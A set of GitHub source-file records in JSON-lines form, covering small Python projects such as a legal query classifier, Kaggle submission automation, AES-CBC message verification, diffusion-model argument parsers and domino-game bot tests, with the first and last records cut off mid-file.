more\n##############################################\n\n# def hasNumbers(string) :\n#     return bool(re.search(r'\d', string))\n\ndef is_query2(query) :\n    query = query.lower()\n\n    fd = open('abbreviation_mapping.json')\n\n    abbreviations = json.load(fd)\n    \n    query_words = re.split(' |, |\. ', query)\n\n    if \"act\" in query_words or \"bill\" in query_words :\n        return 2\n\n    for key in abbreviations:\n        if key == \"\":\n            continue\n        if key.lower() in query_words and key.lower() not in stop_words:\n            return 2\n\n    return -1\n\n\n\n\ndef is_query3(query) :\n    query = query.lower()\n\n    query = query.replace('.', '')\n\n    if query.find(\" v \") != -1 or query.find(\" vs \") !=-1 or query.find(\" versus \") !=-1:\n        return 3\n    else:\n        return -1\n\n\ndef is_query4(query) :\n    query = query.lower()\n\n    query_words = re.split(', |\. | ', query)\n\n    if len(query_words) < 8:\n        return -1\n    \n    stop_count = 0\n    count = 0\n\n    for word in query_words:\n        if word == \"\":\n            continue\n        if word in stop_words:\n            stop_count += 1\n        count += 1\n\n    if count == 0:\n        return -1\n    \n    stop_count /= count\n    \n    if stop_count > 0.3:\n        return 4\n    else:\n        return -1\n    \n    \ndef query_identifier(query) :\n\n    # query 2\n    type_of_query = is_query2(query)\n\n    if type_of_query == 2 :\n        return type_of_query\n\n    # query 3\n    type_of_query = is_query3(query)\n\n    if type_of_query == 3:\n        return type_of_query\n    \n    # query 4\n    type_of_query = is_query4(query)\n\n    if type_of_query == 4:\n        return type_of_query\n\n    return 1\n\n\n# print (\"Enter query\")\n\n# query = input()\n\n# print(query_identifier(query))\n","repo_name":"142ayushkumar/LegalAssistant","sub_path":"query_identifier/query_identifier.py","file_name":"query_identifier.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13450081798","text":"from newindice import findex\nimport pytest\nimport numpy as np\n\n\n@pytest.mark.parametrize('myin, expect', [\n\n    (np.array([1, 2, 3]), [3, 1]),\n    (([1, 2, 3]), [3, 1]),\n    (np.array([3, -2, 1]), [3, -2]),\n\n])\ndef test_findex(myin, expect):\n    nt, mt = findex(myin)\n\n    assert nt == expect[0]\n    assert mt == expect[1]\n\n\n@pytest.mark.parametrize('myin_, expect_', [\n\n    (np.array([1, 2, 3]), False),\n    (([1, 2, 3]), False),\n    (np.array([3, -2, 1]), False),\n    ([], True),\n    (1, True),\n    ('n', True),\n\n])\ndef test_findex2(myin_, expect_):\n    try:\n        findex(myin_)\n        myb = False\n    except TypeError:\n        myb = True\n    finally:\n        assert myb == expect_\n","repo_name":"MattGuptil/bme590hrm","sub_path":"test_findex.py","file_name":"test_findex.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34549583830","text":"from pyprocessing import *\n\np = [None] * 3\nshift = 1.0\nfade = 0\nfillCol = 0\nrot = 0\nspin = 0\n\n\ndef setup():\n    size(200, 200)\n    background(0)\n    smooth()\n    global fade, spin\n    fade = 255.0 / (width / 2.0 / shift)\n    spin = 360.0 / (width / 2.0 / shift)\n    p[0] = PVector(-width / 2, height / 2)\n    p[1] = PVector(width / 2, height / 2)\n    p[2] = PVector(0, -height / 2)\n    noStroke()\n    translate(width / 2, height / 2)\n    triBlur()\n\n\ndef triBlur():\n    global fillCol, rot\n    fill(fillCol)\n    fillCol += fade\n    rotate(spin)\n    # another interesting variation: uncomment the line below\n    # rot+=radians(spin) rotate(rot)\n    p[0].x += shift\n    p[0].y -= shift\n    p[1].x -= shift\n    p[1].y -= shift\n    p[2].y += shift\n    triangle(p[0].x, p[0].y, p[1].x, p[1].y, 
p[2].x, p[2].y)\n if p[0].x < 0:\n # recursive call\n triBlur()\n\n\nrun()\n","repo_name":"reign912/MazeGenerator-Solver","sub_path":"pyprocessing/examples/misc/triflower.py","file_name":"triflower.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121486226","text":"# https://atcoder.jp/contests/dwacon2018-prelims/submissions/15406971\n# A - ニコニコ文字列判定\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef resolve():\n s = input()\n if s[0] == s[2] and s[1] == s[3]:\n print(\"Yes\")\n else:\n print(\"No\")\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/DWANGO_2018_Qual/DWANGO_2018_Qual-A.py","file_name":"DWANGO_2018_Qual-A.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14980535776","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\n\ninput = sys.argv\nif len(input) !=2:\n\tprint('Usage: {} SEQ'.format(sys.argv[0]))\n\tsys.exit(1)\n\nrna = input[1]\nprocode = dict()\nfile = open('codons.rna').read().split()\ncount = 0\nfor line in file:\n\tif count % 2 ==0:\n\t\tprocode[line] = '' \t\n\t\tprev = line\n\telse:\n\t\tprocode[prev] = line\n\tcount+=1\n\nk=3\nprotein = []\nfor i in range(0, len(rna), k):\n\tfor key in procode.keys():\n\t\tif rna[i:i+k].lower() == key.lower():\n\t\t\tprotein.append(procode[key])\n\nprint('{}'.format(''.join(protein)))\n\t\n\n\n","repo_name":"cmrrsn/abe487","sub_path":"problems/proteins/prot.py","file_name":"prot.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33104214550","text":"#Week 5, Task 1\r\n\r\n''' This code features a linked list. I was tasked to create a function that will delete the duplicate nodes from\r\nthe linked list.'''\r\n\r\nimport unittest\r\n\r\nclass Node(object):\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n self.prev = None\r\n\r\n\r\nclass List(object):\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def insert(self, n, x):\r\n if n != None:\r\n x.next = n.next\r\n n.next = x\r\n x.prev = n\r\n if x.next != None:\r\n x.next.prev = x\r\n if self.head == None:\r\n self.head = self.tail = x\r\n x.prev = x.next = None\r\n elif self.tail == n:\r\n self.tail = x\r\n\r\n def display(self):\r\n values = []\r\n n = self.head\r\n while n != None:\r\n values.append(str(n.value))\r\n n = n.next\r\n print(\"List: \", \",\".join(values))\r\n\r\n def delete_duplicates(self): # Week 5, Task 1\r\n\r\n '''Python doesn't really have pointers, they are more\r\n references to objects. They are kind of mutable memory. 
For\r\n example a temporary pointer1 gets the address of self.head, but\r\n it can be handled independently, without reference to head in\r\n particular'''\r\n\r\n pointer1 = self.head #head is the first node of a linked list\r\n #assigns the address of head to temporary pointer\r\n while pointer1 != None and pointer1.next != None: #continue the loop until nodes have value\r\n pointer2 = pointer1 #assign another pointer, which will point to the memory address of pointer1\r\n while pointer2.next != None: #as long as the next node has value\r\n if pointer1.value == pointer2.next.value: #check if the values of both pointers match\r\n pointer2.next = pointer2.next.next #results in original pointer2.next getting deleted\r\n else:\r\n pointer2 = pointer2.next #pointer2 takes the value of the next node\r\n pointer1 = pointer1.next #pointer1 takes the value of the next node and continues the loop\r\n\r\nif __name__ == '__main__':\r\n l = List()\r\n l.insert(None, Node(4))\r\n l.insert(l.head, Node(2))\r\n l.insert(l.head, Node(6))\r\n l.insert(l.head, Node(8))\r\n l.insert(l.head, Node(6))\r\n l.insert(l.head, Node(8))\r\n l.display()\r\n l.delete_duplicates()\r\n l.display()\r\n\r\n","repo_name":"gerganzh/Python-Mini-Projects","sub_path":"LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29674970195","text":"import sys, getopt\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import SHA256, HMAC\nfrom Crypto import Random\nfrom CBCMessageEncrypter import CBCMessageEncrypter\nfrom MACandEncryptionKeyManager import MACandEncryptionKeyManager\n\nclass CBCMessageVerification():\n\n def decryptMessage(self, receiver, msg):\n # parse the message\n header = msg[0:9] # header is 9 bytes long\n iv = msg[9:9 + AES.block_size] # iv is AES.block_size bytes long\n encrypted = msg[(9 + AES.block_size):] # the rest of the message is the encrypted part\n header_version = header[0:2] # version is encoded on 2 bytes\n header_type = header[2:3] # type is encoded on 1 byte\n header_length = header[3:5] # msg length is encoded on 2 bytes\n header_sqn = header[5:9] # msg sqn is encoded on 4 bytes\n\n # sender = header_type.decode('utf-8')\n\n #CHANGE\n # rcvsqn = 0\n # sndsqn = 1\n\n efile = open('../netsim/network/' + receiver + '/encryption_key.pem', 'rb')\n enckey = efile.read()\n enckey = bytes.fromhex(enckey.decode('utf-8'))\n\n #print(type(enckey))\n\n mfile = open('../netsim/network/' + receiver + '/mac_key.pem', 'rb')\n mackey = mfile.read()\n mackey = bytes.fromhex(mackey.decode('utf-8'))\n\n print(\"Message header:\")\n print(\" - protocol version: \" + header_version.hex() + \" (\" + str(header_version[0]) + \".\" + str(header_version[1]) + \")\")\n print(\" - message type: \" + header_type.hex() + \" (\" + str(int.from_bytes(header_type, byteorder='big')) + \")\")\n print(\" - message length: \" + header_length.hex() + \" (\" + str(int.from_bytes(header_length, byteorder='big')) + \")\")\n print(\" - message sequence number: \" + header_sqn.hex() + \" (\" + str(int.from_bytes(header_sqn, byteorder='big')) + \")\")\n\n # check the msg length\n if len(msg) != int.from_bytes(header_length, byteorder='big'):\n print(\"Warning: Message length value in header is wrong!\")\n print(\"Processing is continued nevertheless...\")\n\n # sndsqn = int.from_bytes(header_type, byteorder='big')\n # rcvsqn = int.from_bytes(rec, byteorder='big')\n sender = 
header_type.decode('utf-8')\n rcvsqnFile = open('../netsim/network/' + receiver + '/rcvsqn/rcvstate' + sender + '.txt' , 'r')\n rcvsqn = rcvsqnFile.read()\n rcvsqnFile.close()\n\n sndsqnFile = open('../netsim/network/' + sender + '/sndsqn/sndstate' + sender + '.txt' , 'r')\n sndsqn = sndsqnFile.read()\n sndsqnFile.close()\n\n # check the sequence number\n print('Receiver: ' + receiver + ' -- sqn#: ' + rcvsqn)\n print('Sender: ' + sender + ' -- sqn#: ' + sndsqn)\n\n Mac_Encryption_manager = MACandEncryptionKeyManager()\n Mac_Encryption_manager.check_sqn_number(receiver, sender, sndsqn)\n\n # print(\"Expecting sequence number \" + str(int(rcvsqn) + 1) + \" or larger...\")\n # if (rcvsqn >= sndsqn):\n # print(\"Error: Message sequence number is too old!\")\n # sys.exit(1)\n # print(\"Sequence number verification is successful.\")\n\n payload = encrypted[:-32]\n mac = encrypted[-32:]\n # verify the mac\n print(\"MAC verification is being performed...\")\n MAC = HMAC.new(mackey, digestmod=SHA256) # create a HMAC object, pass the right key and specify SHA256 as the hash fn\n MAC.update(header)\n MAC.update(payload)\n MAC.update(iv)\n comp_mac = MAC.digest() # compute the final HMAC value\n\n # print(\"MAC value received: \" + mac.hex())\n # print(\"MAC value computed: \" + comp_mac.hex())\n #print(len(mac))\n if (comp_mac != mac):\n print(\"Error: MAC verification failed!\")\n sys.exit(1)\n print(\"MAC verified correctly.\")\n\n # decrypt the encrypted part\n print(\"Decryption is attempted...\")\n ENC = AES.new(enckey, AES.MODE_CBC, iv)\n decrypted = ENC.decrypt(encrypted)\n\n # remove padding\n i = -1\n decrypted = decrypted[:-32]\n while (decrypted[i] == 0x00): i -= 1\n padding = decrypted[i:]\n decrypted = decrypted[:i]\n # print(\"Padding \" + padding.hex() + \" is observed\")\n if(padding[0] != 0x80):\n print(\"Error: Wrong padding detected!\")\n sys.exit(1)\n print(\"Padding is successfully removed.\")\n return decrypted\n\n\n# test = CBCMessageVerification()\n# encrypter = CBCMessageEncrypter()\n# testString = 'this is a long test that we run here'\n# test.decryptMessage('B', encrypter.encryptMessage('A', testString))\n","repo_name":"zackrossman10/encrypted_messenger","sub_path":"crypto/CBCMessageVerification.py","file_name":"CBCMessageVerification.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10077093633","text":"import argparse\n\n\ndef get_ti_parser(**parser_kwargs):\n def str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in (\"yes\", \"true\", \"t\", \"y\", \"1\"):\n return True\n elif v.lower() in (\"no\", \"false\", \"f\", \"n\", \"0\"):\n return False\n else:\n raise argparse.ArgumentTypeError(\"Boolean value expected.\")\n\n parser = argparse.ArgumentParser(**parser_kwargs)\n parser.add_argument(\n \"-n\",\n \"--name\",\n type=str,\n const=True,\n default=\"\",\n nargs=\"?\",\n help=\"postfix for logdir\",\n )\n parser.add_argument(\n \"-r\",\n \"--resume\",\n type=str,\n const=True,\n default=\"\",\n nargs=\"?\",\n help=\"resume from logdir or checkpoint in logdir\",\n )\n parser.add_argument(\n \"-b\",\n \"--base\",\n nargs=\"*\",\n metavar=\"base_config.yaml\",\n help=\"paths to base configs. Loaded from left-to-right. 
\"\n \"Parameters can be overwritten or added with command-line options of the form `--key value`.\",\n default=list(),\n )\n parser.add_argument(\n \"-t\",\n \"--train\",\n type=str2bool,\n const=True,\n default=False,\n nargs=\"?\",\n help=\"train\",\n )\n parser.add_argument(\n \"--no-test\",\n type=str2bool,\n const=True,\n default=False,\n nargs=\"?\",\n help=\"disable test\",\n )\n parser.add_argument(\n \"-p\",\n \"--project\",\n help=\"name of new or path to existing project\"\n )\n parser.add_argument(\n \"-d\",\n \"--debug\",\n type=str2bool,\n nargs=\"?\",\n const=True,\n default=False,\n help=\"enable post-mortem debugging\",\n )\n parser.add_argument(\n \"-s\",\n \"--seed\",\n type=int,\n default=23,\n help=\"seed for seed_everything\",\n )\n parser.add_argument(\n \"-f\",\n \"--postfix\",\n type=str,\n default=\"\",\n help=\"post-postfix for default name\",\n )\n parser.add_argument(\n \"-l\",\n \"--logdir\",\n type=str,\n default=\"logs\",\n help=\"directory for logging dat shit\",\n )\n parser.add_argument(\n \"--scale_lr\",\n type=str2bool,\n nargs=\"?\",\n const=True,\n default=True,\n help=\"scale base-lr by ngpu * batch_size * n_accumulate\",\n )\n\n parser.add_argument(\n \"--datadir_in_name\",\n type=str2bool,\n nargs=\"?\",\n const=True,\n default=True,\n help=\"Prepend the final directory in the data_root to the output directory name\")\n\n parser.add_argument(\n \"--use_facial_loss\",\n action='store_true',\n help=\"Use facial loss when fine tuning text-to-image model\"\n )\n\n parser.add_argument(\n \"--use_random_prompt\",\n action='store_true',\n help=\"Use random prompt when fine tuning text-to-image model\"\n )\n\n parser.add_argument(\n \"--descriptive_p\",\n type=float,\n default=0.2,\n help=\"concatenate descriptive words with given probabilities\"\n )\n\n parser.add_argument(\n \"--gamma\",\n type=float,\n default=0.1,\n help=\"ratio of what momentum vector update embedding vector\"\n )\n\n parser.add_argument(\"--actual_resume\",\n type=str,\n required=True,\n help=\"Path to model to actually resume from\")\n\n parser.add_argument(\"--data_root\",\n type=str,\n required=True,\n help=\"Path to directory with training images\")\n\n parser.add_argument(\"--embedding_manager_ckpt\",\n type=str,\n default=\"\",\n help=\"Initialize embedding manager from a checkpoint\")\n\n parser.add_argument(\"--placeholder_string\",\n type=str,\n help=\"Placeholder string which will be used to denote the concept in future prompts. 
Overwrites the config options.\")\n\n parser.add_argument(\"--init_word\",\n type=str,\n help=\"Word to use as source for initial token embedding\")\n\n parser.add_argument(\n \"--negative_prompt\",\n type=str,\n nargs=\"?\",\n default=\"deformed, cripple, ugly, additional arms, additional legs, additional head, two heads, multiple people, group of people black and white, grayscale, collage, cropped head, out of frame, blurry, group of people, morbid, mutilated, extra fingers, mutated hands, poorly drawn hands, poorly drawn face, mutation, bad anatomy, bad proportions, extra limbs, disfigured, malformed limbs, missing arms, missing legs, extra arms, extra legs, fused fingers, too many fingers\",\n help=\"the negative prompt to sample during training\"\n )\n\n parser.add_argument(\n \"--class_word\",\n type=str,\n help=\"Word to embed next to the identifier\"\n )\n\n return parser\n\n\ndef get_txt2img_parser(**parser_kwargs):\n parser = argparse.ArgumentParser(**parser_kwargs)\n\n parser.add_argument(\n \"--name\",\n type=str,\n nargs=\"?\",\n default=\"woman\",\n help=\"the sampled image name\"\n )\n parser.add_argument(\n \"--prompt\",\n type=str,\n nargs=\"?\",\n default=\"a painting of a virus monster playing guitar\",\n help=\"the prompt to render\"\n )\n parser.add_argument(\n \"--negative_prompt\",\n type=str,\n nargs=\"?\",\n default=\"deformed, cripple, ugly, additional arms, additional legs, additional head, two heads, multiple people, group of people black and white, grayscale, collage, cropped head, out of frame, blurry, group of people, morbid, mutilated, extra fingers, mutated hands, poorly drawn hands, poorly drawn face, mutation, bad anatomy, bad proportions, extra limbs, disfigured, malformed limbs, missing arms, missing legs, extra arms, extra legs, fused fingers, too many fingers\",\n help=\"the negative prompt to render\"\n )\n parser.add_argument(\n \"--outdir\",\n type=str,\n nargs=\"?\",\n help=\"dir to write results to\",\n default=\"outputs/txt2img-samples\"\n )\n parser.add_argument(\n \"--skip_grid\",\n action='store_true',\n help=\"do not save a grid, only individual samples. Helpful when evaluating lots of samples\",\n )\n parser.add_argument(\n \"--skip_save\",\n action='store_true',\n help=\"do not save individual samples. For speed measurements.\",\n )\n parser.add_argument(\n \"--ddim_steps\",\n type=int,\n default=50,\n help=\"number of ddim sampling steps\",\n )\n parser.add_argument(\n \"--plms\",\n action='store_true',\n help=\"use plms sampling\",\n )\n parser.add_argument(\n \"--laion400m\",\n action='store_true',\n help=\"uses the LAION400M model\",\n )\n parser.add_argument(\n \"--fixed_code\",\n action='store_true',\n help=\"if enabled, uses the same starting code across samples \",\n )\n parser.add_argument(\n \"--ddim_eta\",\n type=float,\n default=0.0,\n help=\"ddim eta (eta=0.0 corresponds to deterministic sampling\",\n )\n parser.add_argument(\n \"--n_iter\",\n type=int,\n default=2,\n help=\"sample this often\",\n )\n parser.add_argument(\n \"--H\",\n type=int,\n default=512,\n help=\"image height, in pixel space\",\n )\n parser.add_argument(\n \"--W\",\n type=int,\n default=512,\n help=\"image width, in pixel space\",\n )\n parser.add_argument(\n \"--C\",\n type=int,\n default=4,\n help=\"latent channels\",\n )\n parser.add_argument(\n \"--f\",\n type=int,\n default=8,\n help=\"downsampling factor\",\n )\n parser.add_argument(\n \"--n_samples\",\n type=int,\n default=3,\n help=\"how many samples to produce for each given prompt. A.k.a. 
batch size\",\n )\n parser.add_argument(\n \"--n_rows\",\n type=int,\n default=0,\n help=\"rows in the grid (default: n_samples)\",\n )\n parser.add_argument(\n \"--scale\",\n type=float,\n default=7.5,\n help=\"unconditional guidance scale: eps = eps(x, empty) + scale * (eps(x, cond) - eps(x, empty))\",\n )\n parser.add_argument(\n \"--from-file\",\n type=str,\n help=\"if specified, load prompts from this file\",\n )\n parser.add_argument(\n \"--config\",\n type=str,\n default=\"configs/stable-diffusion/v1-inference.yaml\",\n help=\"path to config which constructs model\",\n )\n parser.add_argument(\n \"--ckpt\",\n type=str,\n default=\"models/ldm/stable-diffusion-v1/model.ckpt\",\n help=\"path to checkpoint of model\",\n )\n parser.add_argument(\n \"--seed\",\n type=int,\n default=42,\n help=\"the seed (for reproducible sampling)\",\n )\n parser.add_argument(\n \"--precision\",\n type=str,\n help=\"evaluate at this precision\",\n choices=[\"full\", \"autocast\"],\n default=\"autocast\"\n )\n\n parser.add_argument(\n \"--embedding_path\",\n type=str,\n help=\"Path to a pre-trained embedding manager checkpoint\")\n\n opt = parser.parse_args()\n\n return opt\n","repo_name":"yeonsumia/momentum-textual-inversion","sub_path":"util/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":9228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"19332259214","text":"from bs4 import BeautifulSoup\nfrom zipfile import ZipFile\nimport requests\n\n\nsession = requests.Session() \ncompetition_name = ''\n\n\ndef init(user_email, password, _competition_name):\n global competition_name\n \n URL = \"https://www.kaggle.com/account/login\"\n login_data = {\n 'UserName': user_email,\n 'Password': password,\n 'JavaScriptEnabled' : True\n }\n competition_name = _competition_name\n r = session.post(URL, data=login_data)\n \n test_URL = 'https://www.kaggle.com/c/%s/submissions/attach' % competition_name\n \n r = session.get(test_URL)\n if r.url == test_URL :\n print('Login Succeed')\n return True\n print('Login Failed')\n return False\n\n\n#@filename = file_path\n#@compress = True or False for compressing to .zip\ndef submission(csv_filename, compress):\n global competition_name\n \n filename = csv_filename\n if compress == True :\n with ZipFile(csv_filename, 'w') as myzip:\n filename = csv_filename + \".zip\"\n myzip.write(filename)\n \n r_pre = session.get('https://www.kaggle.com/c/%s/submissions/attach' % competition_name)\n soup = BeautifulSoup(r_pre.content, 'html.parser')\n token = soup.find('input', {'name': '__RequestVerificationToken'})['value']\n competition_id = soup.find('input', {'name': 'CompetitionId'})['value']\n \n payload = {\n 'CompetitionId': competition_id,\n '__RequestVerificationToken': token,\n 'IsScriptVersionSubmission': 'False',\n 'SubmissionDescription': 'This-is-description!'\n }\n files = {\n 'SubmissionUpload': open(filename, 'rb')\n }\n \n r = session.post('https://www.kaggle.com/competitions/submissions/accept', data=payload, files=files)\n if r.status_code == 200:\n print(\"Submission Succeed\")\n return True\n print(\"Submission Failed\")\n return False\n","repo_name":"dbgsprw/KaggleAutoSubmission","sub_path":"KAS.py","file_name":"KAS.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3705438443","text":"import os\n\n# Root directory to perform build operations.\n# For testing/development, this can be 
changed to redirect build scripts away\n# from the build server, e.g. a user's home directory. Set the environment\n# variables DLSBUILD_ROOT_DIR and/or DLSBUILD_WIN_ROOT_DIR to override the\n# default location.\n# Be sure that the root dir contains the expected directories (e.g. work/etc/build/queue).\nDLSBUILD_ROOT_DIR = os.getenv(\"DLSBUILD_ROOT_DIR\", \"/dls_sw\")\nDLSBUILD_WIN_ROOT_DIR = os.getenv(\"DLSBUILD_WIN_ROOT_DIR\", \"W:/\")\n\nLDAP_SERVER_URL = 'ldap://altfed.cclrc.ac.uk'\nGIT_ROOT = \"dascgitolite@dasc-git.diamond.ac.uk\"\n\n_gelflog_server_addr = os.getenv('ADE_GELFLOG_SERVER', \"graylog2.diamond.ac.uk:12201\").split(':')\nGELFLOG_SERVER = _gelflog_server_addr[0]\nGELFLOG_SERVER_PORT = _gelflog_server_addr[1]\n\n_syslog_server = os.getenv(\"ADE_SYSLOG_SERVER\", \"{}:12209\".format(GELFLOG_SERVER)).split(':')\nSYSLOG_SERVER = _syslog_server[0]\nSYSLOG_SERVER_PORT = _syslog_server[1]\n\nBUILD_SERVERS = {\n    \"Linux\": {\n        \"redhat6-x86_64\": [\"R3.14.12.3\"],\n        \"redhat7-x86_64\": [\"R3.14.12.7\"],\n    },\n    \"Windows\": {\n        \"windows6-x86\" : [\"R3.14.12.3\"],\n        \"windows6-AMD64\" : [\"R3.14.12.3\"],\n        \"windows6_3-AMD64\" : [\"R3.14.12.7\"],\n    }\n}\n\nSERVER_SHORTCUT = {\n    \"6\": \"redhat6-x86_64\",\n    \"7\": \"redhat7-x86_64\",\n    \"32\": \"windows6-x86\",\n    \"64\": \"windows6-AMD64\",\n    \"64_2012\": \"windows6_3-AMD64\",\n}\n\n","repo_name":"EmilioPeJu/dls_ade","sub_path":"dls_ade/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41661448797","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndataLRS=pd.read_csv('/media/student/SPATIU/LTSID/Metrics/metrics_C.csv', sep=' ', header=None)\ndata=pd.read_csv('/media/student/SPATIU/LTSID/Metrics/metrics_D.csv', sep=\" \", header=None)\npsnr_C=dataLRS[1].values\nssim_C=dataLRS[3].values\npsnr_D=data[1].values\nssim_D=data[3].values\n\navg_C=np.mean(psnr_C)\navg_D=np.mean(psnr_D)\nplt.xlabel('Photo')\nplt.ylabel('PSNR')\nplt.title('PSNR_Classic VS. PSNR_Dropout')\nline_up, = plt.plot(np.array(range(0, len(psnr_C))), psnr_C, label='PSNR Classic avg: %0.5f ' % (avg_C))\nline_down, = plt.plot(np.array(range(0, len(psnr_D))), psnr_D, label='PSNR Dropout avg: %0.5f ' % (avg_D))\nplt.legend(handles=[line_up, line_down])\n\nplt.show()\n\nminLRS=np.mean(ssim_C)\nminOri=np.mean(ssim_D)\nplt.xlabel('Photo')\nplt.ylabel('SSIM')\nplt.title('SSIM_Classic VS. 
SSIM_Dropout')\nline_up, = plt.plot(np.array(range(0, len(ssim_C))), ssim_C, label='SSIM Classic avg: %0.5f ' % (minLRS))\nline_down, = plt.plot(np.array(range(0, len(ssim_D))), ssim_D, label='SSIM Dropout avg: %0.5f ' % (minOri))\nplt.legend(handles=[line_up, line_down])\n\nplt.show()\n","repo_name":"florinSacadat/LearningToSeeInTheDark","sub_path":"PlotMetrics.py","file_name":"PlotMetrics.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43726007736","text":"import collections\nimport unittest\n\nfrom networkx import edges\n\nfrom src.Domino import Domino\nfrom src.GameState import GameState\nfrom src.Train import Train\nfrom src.bots.state.BotGameState import BotGameState, BotMove\nfrom src.bots.state.BotTrain import BotTrain\nfrom src.bots.state.Path import Path\nfrom src.bots.state.Play import Play\n\n\nclass BotGameStateTest(unittest.TestCase):\n def get_test_game_state(self):\n game_state = GameState(5)\n player = game_state.players[0]\n\n game_state.trains.append(Train(0, 10, game_state.players[0])) # mine\n game_state.trains.append(Train(1, 11, game_state.players[1])) # private\n game_state.trains.append(Train(2, 12, game_state.players[2])) # same start as 3\n game_state.trains.append(Train(3, 12, game_state.players[3])) # same start as 2\n game_state.trains.append(Train(5, 3, None)) # mexican\n\n game_state.trains[2].make_public()\n game_state.trains[3].make_public()\n game_state.trains[4].make_public()\n\n player.dominoes.append(Domino(10, 10)) # can play on t0\n player.dominoes.append(Domino(6, 3)) # can play on t4\n player.dominoes.append(Domino(0, 12)) # can play on t2 and t3\n player.dominoes.append(Domino(11, 8)) # cannot play, private\n player.dominoes.append(Domino(4, 3)) # can play on t4\n player.dominoes.append(Domino(2, 12)) # can play on t2 and t3\n player.dominoes.append(Domino(0, 1)) # can play on d2\n player.dominoes.append(Domino(1, 3)) # can play on d4 and d6 and t4\n player.dominoes.append(Domino(3, 0)) # loop between d7 and d8, can also play on d4 and t4\n\n return game_state, BotGameState(game_state, player)\n\n def test_bot_game_state(self):\n game_state, bot_game_state = self.get_test_game_state()\n bot_trains = []\n for train in game_state.trains:\n bot_trains.append(BotTrain(train, train.identity.owner))\n\n self.assertEqual(bot_trains[0], bot_game_state.my_train)\n self.assertIn(bot_trains[1], bot_game_state.other_trains)\n self.assertIn(bot_trains[0], bot_game_state.playable_trains)\n self.assertIn(bot_trains[2], bot_game_state.playable_trains)\n self.assertIn(bot_trains[3], bot_game_state.playable_trains)\n self.assertIn(bot_trains[4], bot_game_state.playable_trains)\n\n self.assertTrue(bot_game_state.mexican_train.identity.mexican)\n\n self.assertEqual(game_state.played_count, bot_game_state.played_count)\n\n for domino in bot_game_state.dominoes:\n self.assertIn(domino, bot_game_state.dominoes_for_number[domino.left])\n self.assertIn(domino, bot_game_state.dominoes_for_number[domino.right])\n\n def test_draw_domino(self):\n game_state, bot_game_state = self.get_test_game_state()\n d = Domino(3, 3)\n bot_game_state.draw_domino(d)\n self.assertIn(d, bot_game_state.dominoes)\n self.assertIn(BotMove(d, bot_game_state.all_trains[4]), bot_game_state.get_all_valid_moves())\n self.assertIn(d, bot_game_state.dominoes_for_number[3])\n self.assertIn((3, 3), edges(bot_game_state.graph))\n\n def test_get_unplayed_count(self):\n game_state, bot_game_state = 
self.get_test_game_state()\n        for i in range(0, 13):\n            self.assertEqual(13 - game_state.played_count[i], bot_game_state.get_unplayed_count(i))\n\n    def test_do_move(self):\n        game_state, bot_game_state = self.get_test_game_state()\n        domino = bot_game_state.dominoes[0]\n        train = bot_game_state.all_trains[0]\n        bot_game_state.do_move(BotMove(domino, train))\n        self.assertNotIn(domino, bot_game_state.dominoes)\n        self.assertNotIn(domino, bot_game_state.dominoes_for_number[10])\n        self.assertEqual(1, bot_game_state.played_count[10])\n        self.assertEqual(12, bot_game_state.get_unplayed_count(10))\n        self.assertEqual(domino, train.cars[-1])\n        self.assertIn(train, bot_game_state.trains_for_number[10])\n\n        domino = bot_game_state.dominoes[0] # Domino(6, 3) was previously [1], but is now [0] since we popped [0]\n        train = bot_game_state.all_trains[4]\n        bot_game_state.do_move(BotMove(domino, train))\n        self.assertNotIn(domino, bot_game_state.dominoes)\n        self.assertNotIn(domino, bot_game_state.dominoes_for_number[6])\n        self.assertNotIn(domino, bot_game_state.dominoes_for_number[3])\n        self.assertEqual(1, bot_game_state.played_count[6])\n        self.assertEqual(1, bot_game_state.played_count[3])\n        self.assertEqual(12, bot_game_state.get_unplayed_count(6))\n        self.assertEqual(12, bot_game_state.get_unplayed_count(3))\n        self.assertEqual(domino, train.cars[-1])\n        self.assertIn(train, bot_game_state.trains_for_number[6])\n        self.assertNotIn(train, bot_game_state.trains_for_number[3])\n\n    def test_get_all_valid_moves(self):\n        game_state, bot_game_state = self.get_test_game_state()\n\n        moves = bot_game_state.get_all_valid_moves()\n\n        expected_moves = [BotMove(bot_game_state.dominoes[0], bot_game_state.all_trains[0]),\n                          BotMove(bot_game_state.dominoes[1], bot_game_state.all_trains[4]),\n                          